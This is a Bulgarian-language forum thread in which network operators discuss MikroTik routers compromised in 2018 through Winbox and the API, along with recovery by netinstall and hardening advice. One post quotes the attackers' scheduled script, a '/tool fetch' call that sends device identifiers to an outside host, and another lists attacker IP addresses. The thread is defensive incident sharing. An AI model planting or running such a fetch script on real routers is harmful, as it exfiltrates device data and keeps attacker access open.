px1 Posted July 22, 2018 Report Share Posted July 22, 2018 Здравейте, Хакнаха ми един mikrotik L4 на X86 платформа. Беше ограничен за достъп само от 5 IP адреса и със спрени всички сървиси осен API и WINBOX Има ли начин да се преинсталира флашката за да се запази лиценза ? www.streambg.net Link to comment Share on other sites More sharing options...
0 stel Posted July 22, 2018 Report Share Posted July 22, 2018 С коя версия беше? Link to comment Share on other sites More sharing options...
0 Administrator 111111 Posted July 22, 2018 Administrator Report Share Posted July 22, 2018 С нетинстал би трябвало да се запази ключа ако не е най наложителната машина пиши на support@mikrotik.com дано намерят какво по дяволите правят гадовете п.с И на последната го лекуват гадовете вече влизам само през ROMON в Scheduler се появява някаква задача "а" която изпълнява скрипт с име "ip" със следното съдържание: {/tool fetch url=("http://www.boss-ip.com/Core/Update.ashx\?key=5bcжжжжжжжжжbf27&action=upload&sncode=A5C1F569жжжжжжжжжA8ED4743AEC042B&dynamic=static") keep-result=no} админ акаунт и да няма се създава включват се всички сървиси и им се махат ограниченията https://forum.mikrotik.com/viewtopic.php?t=135762 Харесай поста ^^^ Форумът е за взаимопомощ а не за свършване на чужда работа ɹɐǝɥ uɐɔ noʎ ǝɹoɯ ǝɥʇ 'ǝɯoɔǝq noʎ ɹǝʇǝınb ǝɥʇ Link to comment Share on other sites More sharing options...
0 master Posted July 22, 2018 Report Share Posted July 22, 2018 Как става достъпа при положение, че е ограничен само от 5 адреса? Analog Audio™ Link to comment Share on other sites More sharing options...
0 px1 Posted July 22, 2018 Author Report Share Posted July 22, 2018 (edited) Версията беше 6.42.5 Първоначално забелязах че че се появява PPTP сървис с име test и се появяваше маскарад на целя трафик и нов pool на DHCP и нови часни адреси. Акаунта и паролите не бяха променени. Веднага смених всички пароли и спрях сървисите освен API (заради Билинга) и WINBOX само от 5 IP адреса. От петък сутринта вече нямам достъп с акаунта си , но интернета на два от рутърите си върви , а на трети е спрял. Третия е с бридж на два от портовете защото го ползвам и за суич. Предполагам че хака се прави по някаква странна схема която чупи моята конфигурация на този рутър. Утре ще купя нов CCR и GR3 за да може после netinstall да изтрия старите рутъри. Предполагам чупят линукса и си оставят врата . Edited July 22, 2018 by px1 www.streambg.net Link to comment Share on other sites More sharing options...
0 Administrator JohnTRIVOLTA Posted July 22, 2018 Administrator Report Share Posted July 22, 2018 Преди 3 часа, master написа: Как става достъпа при положение, че е ограничен само от 5 адреса? Мисля проблема е в ползването на non-ssl API , а и по-добре след такъв пробив да се ползва последен бекъп, като му се сменят всички пароли и се затвърди стената, чрез смяна на портове, динамични блек листи за брутфорс и сканери, уайт листи за достъп и т.н. преди да се подвърже към публичното пространство! Link to comment Share on other sites More sharing options...
0 master Posted July 22, 2018 Report Share Posted July 22, 2018 От години не се беше случвало да видя в лога IP адреси който са се опитвали да се конектнат. На един от микротиците за 24 часа са се опитвали тези : 195.43.95.9о 185.2о9.0.12 5.188.4о.99 5.188.4о.100 138.68.51.1о7 77.72.83.11едно Analog Audio™ Link to comment Share on other sites More sharing options...
0 px1 Posted July 22, 2018 Author Report Share Posted July 22, 2018 Тука е описна проблема https://forum.mikrotik.com/viewtopic.php?f=2&t=135774 и е масов www.streambg.net Link to comment Share on other sites More sharing options...
0 Administrator kokaracha Posted July 23, 2018 Administrator Report Share Posted July 23, 2018 Достъп от 5 адреса за всичко или само за изброените услуги ? А от кой адрес са се логнали първия път ? Use since OpenBSD 3.x FreeBSD 4.x Centos 5.x Debian 3.x Ubuntu 7.x Аз съм фен на OpenWRT. Горчивината от лошото качество остава дълго след като е преминало удоволствието от ниската цена. _____________________________ ___|____|____|____|____|____|__ _|____|____|____|____|____|____ ___|____|_ Удряй _|____|____|__ _|____|___ главата ___|____|____ ___|____|_ си тук!! |____|____|__ _|____|____|____|____|____|____ ___|____|____|____|____|____|__ Link to comment Share on other sites More sharing options...
0 Administrator 111111 Posted July 23, 2018 Administrator Report Share Posted July 23, 2018 Преди 10 часа, kokaracha написа: Достъп от 5 адреса за всичко или само за изброените услуги ? А от кой адрес са се логнали първия път ? Няма лог за първия път защото по някакъв начин теглят базата с поребителите Харесай поста ^^^ Форумът е за взаимопомощ а не за свършване на чужда работа ɹɐǝɥ uɐɔ noʎ ǝɹoɯ ǝɥʇ 'ǝɯoɔǝq noʎ ɹǝʇǝınb ǝɥʇ Link to comment Share on other sites More sharing options...
0 Fibernet Posted July 24, 2018 Report Share Posted July 24, 2018 (edited) Исто и кај мене хакнат един от два МТ ccr. Само winbox port е дозволен. Edited July 24, 2018 by Fibernet Link to comment Share on other sites More sharing options...
0 Administrator kokaracha Posted July 24, 2018 Administrator Report Share Posted July 24, 2018 Преди 11 часа, 111111 написа: Няма лог за първия път защото по някакъв начин теглят базата с поребителите Няма много начини за това. Или са имали данните и достъп или ограничението по адреси не работи или не е конфигнато правилно ( локанли мрежи ?). Use since OpenBSD 3.x FreeBSD 4.x Centos 5.x Debian 3.x Ubuntu 7.x Аз съм фен на OpenWRT. Горчивината от лошото качество остава дълго след като е преминало удоволствието от ниската цена. _____________________________ ___|____|____|____|____|____|__ _|____|____|____|____|____|____ ___|____|_ Удряй _|____|____|__ _|____|___ главата ___|____|____ ___|____|_ си тук!! |____|____|__ _|____|____|____|____|____|____ ___|____|____|____|____|____|__ Link to comment Share on other sites More sharing options...
0 Administrator 111111 Posted July 24, 2018 Administrator Report Share Posted July 24, 2018 Преди 9 часа, Fibernet написа: Исто и кај мене хакнат един от два МТ ccr. Само winbox port е дозволен. Точно през този порт става атаката. Харесай поста ^^^ Форумът е за взаимопомощ а не за свършване на чужда работа ɹɐǝɥ uɐɔ noʎ ǝɹoɯ ǝɥʇ 'ǝɯoɔǝq noʎ ɹǝʇǝınb ǝɥʇ Link to comment Share on other sites More sharing options...
0 msboy Posted July 24, 2018 Report Share Posted July 24, 2018 Явно Микротик го закъсаха относно сигурност. По неофициална информация знам че изпращането на файлове с вградения модул за изпращане на мейли също е бил компроментиран. Явно е въпрос на време да изпищят още хора. Link to comment Share on other sites More sharing options...
0 px1 Posted July 24, 2018 Author Report Share Posted July 24, 2018 Здравейте, преинсталирах си флашката без да губя лиценза използвайки описанието на MIKOROTIK https://forum.mikrotik.com/viewtopic.php?t=86528 По въпроса с пробива прилагам преинсталация с netinstall , смяна на портовете и паролите и филтрация на портовете още във входящия рутър. Ще изчакам няколко дни да видя има ли ефект. www.streambg.net Link to comment Share on other sites More sharing options...
0 Administrator kokaracha Posted July 24, 2018 Administrator Report Share Posted July 24, 2018 Изглеждат глупаво тези мерки щом има проблем със сигурноста на самата система. По добре някакъв тунел с адмиснистративна */29 мрежа примерно би било доста по сигурно. Use since OpenBSD 3.x FreeBSD 4.x Centos 5.x Debian 3.x Ubuntu 7.x Аз съм фен на OpenWRT. Горчивината от лошото качество остава дълго след като е преминало удоволствието от ниската цена. _____________________________ ___|____|____|____|____|____|__ _|____|____|____|____|____|____ ___|____|_ Удряй _|____|____|__ _|____|___ главата ___|____|____ ___|____|_ си тук!! |____|____|__ _|____|____|____|____|____|____ ___|____|____|____|____|____|__ Link to comment Share on other sites More sharing options...
Question
px1
Здравейте, Хакнаха ми един mikrotik L4 на X86 платформа.
Беше ограничен за достъп само от 5 IP адреса и със спрени всички сървиси осен API и WINBOX
Има ли начин да се преинсталира флашката за да се запази лиценза ?
www.streambg.net
Link to comment
Share on other sites
Top Posters For This Question
12
10
7
7
Popular Days
Aug 1
11
Jul 25
8
Jul 22
8
Jul 24
7
Top Posters For This Question
JohnTRIVOLTA 12 posts
111111 10 posts
px1 7 posts
master 7 posts
Popular Days
Aug 1 2018
11 posts
Jul 25 2018
8 posts
Jul 22 2018
8 posts
Jul 24 2018
7 posts
Popular Posts
_mi_
Днес се заех малко с проблема и намерих питонските файлове за експлоита....! Работи супер елегантно - сам си хаквах моите устройства, уязвимоста е при сървисите, ако там не набиеш ипитата за позволен
111111
Латвииците нещо премълчават А дайте логично обяснение как се регенерира хост ключа? Борда е облъчен на интернет от 24ч с актуална версия
Щирлиц
Аз лично бих пуснал и поне 2 независими онлайн скенера за всеки случай ..... При преинсталиране не винаги се убиват гадовете - случвало ми се е да да успее да зарази флашката с дистрибутива. С 300 зо
69 answers to this question
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now